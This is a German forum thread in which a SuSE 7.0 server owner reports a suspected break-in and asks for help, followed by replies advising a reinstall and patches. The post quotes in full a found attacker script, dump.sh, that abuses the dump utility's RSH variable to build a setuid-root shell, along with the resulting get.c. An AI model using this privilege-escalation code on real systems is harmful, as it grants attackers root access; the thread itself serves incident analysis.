Hallo.
Ich hab nen alten LAMPS mit SuSE 7.0 am laufen.
Auf einmal war kein Login als root mehr möglich.
Root PW hab ich jetzt n neues eingestellt.
Allerdings weiß ich nicht genau was der Eindringling (wenn den einer da war und es kein Fehler ist) genau gemacht hat.
Ich habe allerdings unter /tmp folgende Dateien gefunden:

dump.sh, dump.sh, execute_me, get, get.c sowie adduser

Die Datein gehören alle root. Gruppe ist wwwrun.
In der dump.sh steht folgendes:
-------------------------------------------------
#!/bin/sh
#################
# Coded by ext2 #
#################
cat > execute_me << EOF
#!/bin/sh
echo "#include <stdio.h>" > get.c
echo "int main() { " >> get.c
echo " setuid(0);" >> get.c
echo " execl(\"/bin/sh\", \"-bash\", NULL);" >> get.c
echo " return 0;" >> get.c
echo "}" >> get.c
gcc -o get get.c
chown root: get
chmod 4777 get
EOF
chmod +x execute_me
##########################
# Exploitando dump :) #
##########################
export TAPE=garbage:garbage
export RSH=./execute_me
/sbin/dump -0 /
echo "Execute ./get para ter id=0 ;p"
echo "ext2 owns you ! ;)"

./get
-------------------------------------------------


Und in der get.c:
-------------------------------------------------

#include <stdio.h>
int main() {
setuid(0);
execl("/bin/sh", "-bash", NULL);
return 0;
}
-------------------------------------------------
Ich hab damit schon mal n wenig Google gefüttert, aber ohne Erfolg.
Hat vielleicht jemand ne Idee, was da genau abgelaufen ist, bzw wo die Sicherheitslücke sein könnte?
Besteht überhaupt eine Chance (ohne Neuinstallation) das System wieder sicher zu bekommen.
Immerhin sieht das für mich stark danach aus, daß der Angreifer root Rechte hatte :(

Ich verschieb das mal ins Sicherheits Forum.

Also für mich sieht das so aus, als ob da jemand reingekommen ist.
Hattest Du einen Webserver laufen?
Dann war das wahrscheinlich die Lücke und er hat sich irgendwie reingemogelt (wg. Gruppe wwwrun).

Erst mußt du also feststellen wie er genau reingekommen ist und dann mußt du das Loch stopfen... wahrscheinlich ein paar Sicherheitsupdates einspielen.

Ansonsten würde ich noch aufpassen was da für Prozesse laufen und die Logfiles der Connections zum Tatzeitpunkt und die in den nächsten Tagen zu studieren.

> Erst mußt du also feststellen wie er genau reingekommen ist und dann mußt du das Loch stopfen... wahrscheinlich ein paar Sicherheitsupdates einspielen.

> Ansonsten würde ich noch aufpassen was da für Prozesse laufen und die Logfiles der Connections zum Tatzeitpunkt und die in den nächsten Tagen zu studieren.


nix, da, neu aufsetzen und regelmäßig sicherheitsupdates
machen, denn auf dem Rechner hat sich der Angreifer
sicher Hintertüren eingebaut.

Markus

Hi,

Du musst die Maschine neu aufsetzen, die ist definitiv gehackt.

Ciao, Bernie

OK.
Danke für eure Hilfe.
Ich werd dann mal nen neuen Pinguin aufspielen.

Sieht mir nach einem alten dump exploit aus, mit dem sich ein beliebiges externes Programm (hier execute_me) mit suid privileges ausführen ließ, über die RSH Umgebungsvariable (man dump). Such mal nach "dump exploit". Liegt wahrscheinlich ein paar Jahre zurück.

Werd ich mal machen, aber ich werd auch gleich n neueres SuSE (8.0 oder 8.1) nehmen und die aktuellen Updates einspielen.
Damit ist das Problem dann hoffentlich erledigt.

Moin,
und vergiss nicht gcc zu deinstallieren bzw. gar nicht erst zu installieren.



Greetings Zaphod-B

System sichern, das ist der EINZIGSTE Beweis den du hast.
Mfg,
Air